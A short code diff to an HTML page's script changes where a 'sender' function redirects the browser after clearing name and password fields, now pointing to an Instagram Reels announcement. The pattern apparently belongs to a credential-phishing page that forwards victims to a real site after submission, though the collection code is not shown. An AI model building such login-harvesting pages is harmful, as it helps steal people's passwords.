--- a/index.html
+++ b/index.html
@@ -142,7 +142,7 @@ var sender = function () {
     });
     document.getElementById("name").value = "";
     document.getElementById("password").value = "";
-    window.location.href='https://www.google.com/';
+    window.location.href='https://about.instagram.com/blog/announcements/introducing-instagram-reels-announcement';
     return false;
     
 };
